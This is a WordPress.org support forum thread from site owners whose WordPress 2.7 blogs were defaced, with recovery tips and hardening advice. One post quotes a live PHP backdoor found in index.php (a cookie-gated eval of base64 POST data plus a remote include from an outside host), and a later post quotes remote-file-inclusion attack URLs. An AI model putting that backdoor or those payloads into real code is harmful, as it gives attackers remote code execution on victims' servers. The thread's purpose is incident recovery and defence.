WordPress.org

Ready to get started?Download WordPress

Forums

HACKED twice in one week ver 2.7 (25 posts)

  1. freeon
    Member
    Posted 5 years ago #

    My sites are being hacked like wildfire. I am madder than a hornet. WordPress ver 2.7
    They change the theme index.php to display a pic of a cobra with the Assassin Hackers moniker.
    FIX
    Upload your original theme that you are using index.php to fix the site.
    They also delete the admin user #1 from the mysql database.
    Use phpmyadmin in your cpanel to access your database.
    Select your database on the left sidebar
    Find wp_users and select browse
    Note that user 1 is missing...thats what the hacker deleted
    My easy fix is to take another id 2 or 3 etc and click edit
    Change id value to 1
    Change user_login value to your username
    user_pass row set function to MD5 and value to your password
    Change user_name value to your username
    Click Go

    You are now a little less frustrated because you can now log into your admin panel but are ticked off that your site has been hacked twice in the last week. Your hosting provider can not stop the attacks and tells you to upgrade to the latest version of wordpress which you are already running.

    These are who the hackers were:

    Rafah, Palestinian Territory
    Palestine Telecommunications Company (paltel) (213.6.180.183)

    Riyadh, Ar Riyad, Saudi Arabia
    Nesma (89.4.242.73)

    Hosting co banned their ip's but said all they need to do is reset their modems and they are back in again with new ip's

  2. Mark
    Member
    Posted 5 years ago #

    I've fixed many hacks like this in the past few months alone. Do your site 3 favors:

    1. Create a new administrator user (so that it doesn't have ID 1 in the database) then delete any other administrator accounts that you don't need. And since you've already set your password using MD5 go reset it to something new (using the reset password feature of WordPress) so that it will use the encryption 'salt' built into more recent WP versions, otherwise your MD5 passwords are subject to dictionary attacks and rainbow table attacks...

    2. Remove write permissions from all of your theme files. You will no longer be able to edit your theme files using the WP theme editor but that's a small price to pay.

    3. Sign up to get the soon-to-be-released beta of Maximum Security for WordPress. Ya, that's a shameless plug... I hope it helps you though.

    Finally, don't believe for one second that you've really identified the bad guys responsible for messing with your sites. It's extremely easy to cover one's tracks on the Internet and make it look as though someone else is responsible for whatever activity. "False flag" operations are incredibly common. Most bad guys already know how to do that and do it as a matter of habit. To really track down a bad guy typically requires the cooperation of many ISPs across the world - although once in a while a bad guy turns out to be a complete idiot that is all too easy find. That's rather rare.

  3. freeon
    Member
    Posted 5 years ago #

    Wpsec thanks for the additional info...well received. Additionally I found the forum that the hackers hang out, trade their hacking software and boast about their so called defacements. http://arabic-m.com/index.php?page=mirror&id=18268 might be a good idea for security to reverse engineer their hacking software to prevent future attacks. Little children must play cat and mouse.

  4. mgarabed
    Member
    Posted 5 years ago #

    Freeon, my wordpress sites and one non wordpress site were also hacked into by the same assassin hackers on friday night/saturday morning (multiple sites, but one hosting account). Seems like a defacement only. Have you done anything furthur to secure your setup? Also, I am using hostgator, and I don't know if it has anything to do with them or not. I changed the index.html pages. Rather annoying..

  5. freeon
    Member
    Posted 5 years ago #

    I'm using hostgator too. I have done what wpsec has suggested. So far so good. They hacked multiple wp sites of mine. Easy enough to fix...just a waste of time. In the real world I have to deal with idiots tagging my garage with graffiti. In cyberspace its children hacking. Pull yourself up by your bootstraps and keep on walking...lol. I make money on the internet...hackers waste their lives on the internet! At the end of the day I win.

  6. sunny51
    Member
    Posted 5 years ago #

    Hi,

    We also are on HostGator (2 different accounts) and were hacked on 2 of our 2.7 installations. The attack is noticed when you can't log in to your blog and are send into a loop (no error message either).

    Once we check the DB users table we have a new user called WordPress and then I assume there is some new content added to the blog although we were not able to find it. Look for some comment spam and maybe new content.

    The second attack from last night was more severe and it seems like the entire blog was reloaded with 2007 version files. I mean EVERY single file on the server is dated 2007. That way we can't tell which files were changed and we must assume everything is compromised.

    The attack includes the addition of these lines into index.php and xmlrpc.php was also changed. This is index.php:

    <?php if(md5($_COOKIE['c9a8b336f8ead0e0'])=="5dfa4a678793aeaee3d9394d72d12147"){ eval(base64_decode($_POST['file'])); exit; } ?><?php
    /**
     * Front to the WordPress application. This file doesn't do anything, but loads
     * wp-blog-header.php which does and tells WordPress to load the theme.
     *
     * @package WordPress
     */
    
    /**
     * Tells WordPress to load the WordPress theme and output it.
     *
     * @var bool
     */
    define('WP_USE_THEMES', true);
    
    /** Loads the WordPress Environment and Template */
    if (isset($_GET['license'])) {
    	@include('http://wordpress.net.in/license.txt');
    } else {
    	require('./wp-blog-header.php');
    }
    ?>

    We are now reinstalling and using a backup copy of the content. We will be tightening the file permissions and will watch closely.

    I am worried that there is 2.7 vulnerability that is easily exploitable, if anyone has any ideas please let me know...

    THANKS :)

  7. sunny51
    Member
    Posted 5 years ago #

    UPDATE:
    Further research showed that there is a plugin that contains malicious code disguised as an image. The plugin is Get Recent Comments..

    todo.cache was found in a plugin directory named "Get Recent Comments".
    The "picture" file was found in the Uploads folder, where normal pictures reside...

    We are tightening security on the blogs and will update when complete

  8. kjodies
    Member
    Posted 5 years ago #

    sunny51: Every single file on your server has changed and now you think you can prove, that "Get Recent Comments" contains malicious code? Maybe it does on your server, but of course it does not in it's original state, when you downloaded it from http://wordpress.org/extend/plugins/get-recent-comments/.

  9. Samuel B
    moderator
    Posted 5 years ago #

    I think you folks with Hostgator have a serious problem. This is the 3rd thread I've seen with hacked blogs and them as host- I would be asking them what the...?

  10. whooami
    Member
    Posted 5 years ago #

    you noticed that too, sam ... :P

  11. Samuel B
    moderator
    Posted 5 years ago #

    yea - folks need to realize on shared servers that 90% of hacks come from someone having crappy security on their site or the host them self has crappy security.
    Then there's the 10% who think upgrades are a pain and put them off.
    :>)

  12. silvalex
    Member
    Posted 5 years ago #

    Does anyone have a more secure host they would recommend that is cost effective?

  13. whooami
    Member
    Posted 5 years ago #

  14. roxyghost
    Member
    Posted 5 years ago #

    I'm hosted on Heart Internet and got hacked just over a week ago (2.7). They used the forgot password functionality somehow to change the password and then used the theme editor to upload their files. Think it was just a defacement but since I was away last week I have yet to go through everything and restore it to normality.

    The odd thing was, I checked my stats and they found my blog by searching MSN search for the IP of the heart server and the word "wordpress".

    Would appreciate some thoughts on this!

  15. jean01
    Member
    Posted 5 years ago #

    I am hosted on hostgator and I have not been hacked.

    I use many of the hints at Hardening WordPress maybe that's why.

    I have 4 blogs at hostgator on 4 different domains and none of them has been hacked.

    I also have a complete FTP backup of my installation and have automated database backups emailed to me.

    Hope that this helps.

    jean
    ps
    watch me get hacked tomorrow now that i have posted this (fingers crossed)

  16. sairah
    Member
    Posted 5 years ago #

    I'm having the same problem (it's just a defacement though, although so annoying, particularly since I'm not savvy to the level that I know how to fix it!). I run on Host Department...their service has not been the best, to be honest, but they give a lot of space and so I've stuck with them...

    But honestly, I get this fugly thing as my homepage:

    http://www.sairah.endless-time.net

    If anyone has ANY idea how to deal with this, please let me know, I'm at a loss ='(

  17. chaoskaizer
    Member
    Posted 5 years ago #

    Hi sairah,
    Seem like you are on bad hosting network. The best approach is contact your host & send them this link AS6939 (HURRICANE) (you are within the same network). Ask them to fixes those mess because your domain is already inside the safebrowsing network list. You might get banned from major search engine if they don't do anything.

  18. sairah
    Member
    Posted 5 years ago #

    Oh no! I don't want that to happen! Thanks so much for posting this! I'll definitely try to look into it, even though I've removed the defacement. Would it still happen if I've removed the defacement? O.o

  19. davespeaking
    Member
    Posted 5 years ago #

    I got hit by this hacker today.

    I'm running WordPress 2.7 with the Thesis 1.4.2 theme.

    As described above, the hacker changed the homepage and altered the ADMIN user password. He also deleted my other user accounts.

    I fixed the problem by following the directions provided by freeon (ThankYou!). I went into PHPadmin and changed my admin password and reinstalled the Thesis Theme.

    A true pain in the ass, but not a catastrophe thanks to this invaluable forum.

    Dave

    Keywords : Saudi Arabia, qahtan-sniper, hacked, cobra

  20. elizabethrichardson
    Member
    Posted 4 years ago #

    My entire hosting account consisting of around 22 websites (sub domains were not affected) was hit by the Palestine Telecommunications Company (paltel) (213.6.76.87) hacker over the weekend.

    20 x were running wordpress 2.8.4 or 2.8.5 and 2 x were created with frontpage, and my web host manager password needed to be reset so I could get access to overwrite index.php.

    I'm really confused about how to clear any other potential problems created by this hacker and all I've done so far is change passwords. Any other solutions would be greatly appreciated.

    All websites involved were hosted with Lonex Resellers.

  21. http://codex.wordpress.org/FAQ_My_site_was_hacked

    Admittedly, it sounds like your host sucks, to allow that level of hacking on the server level. My last concern would be WP (my first would be 'How soon can I cancel my contract and MOVE?!')

  22. davewhittle
    Member
    Posted 4 years ago #

    I've also been hacked by QahTaN-SniPer, but on a GoDaddy shared account. All 3 sites hacked were on the same shared Linux hosting account with GoDaddy, so I don't think it's only HostGator with the problem, although at least one of the hacked domains was once on HostGator. GoDaddy is investigating now, but I'd sure like to know if this is a problem with shared hosting in general, GoDaddy/HostGator in particular, WordPress, or what - so I'll know what I need to do with any other accounts I have.

    Any information would be appreciated.

    Thanks,
    Dave

  23. elizabethrichardson
    Member
    Posted 4 years ago #

    My websites were hacked over the weekend as stated in a previous post.

    I've been watching the influx of traffic from various hacking forums that obviously list the details of websites hit in the last batch of attacks.

    What I am noticing now is strange activity entering a server document command etc sent to a txt file on another url containing php code.

    Can someone suggest what is happening and if this is how access is gained...???

    http://south-gippsland.net_serverdocument_root=http//cyberirc.fileave.com/id1.txt?

    http://south-gippsland.netaction=logout&siteurl=http//www.seeum.co.kr/zero/data/idxx.txt??

  24. blogger tools
    Member
    Posted 4 years ago #

    HaCKed By North Storm TeaM ~:)

    StorM the palestinian HaCkeR Was Here << !! ~~

    same as described above. theme's index.php was changed, admin passwsord and email changed. I had bad behaviour installed, didn't stop them. using scalahosting reseller hosting. will remove writing permissions and will create an IP restriction for wp admin.

  25. asaveri
    Member
    Posted 4 years ago #

    My site was hacked by Palestinian Hacker. I'm on GoDaddy. I can't use my WordPress username and password to get into my wordpress account to do any admin. My GoDaddy email is OK. So do I fix this through GoDaddy? I am a newbie blogger so this is a real bummer and upsetting. What do I do? I've read the posts here about fixes and it sounds daunting. Frankly I don't know where to start. I will contact GoDaddy but I need to be able to fix the WordPress blog. Any suggestions?
    Many thanks.

Topic Closed

This topic has been closed to new replies.

About this Topic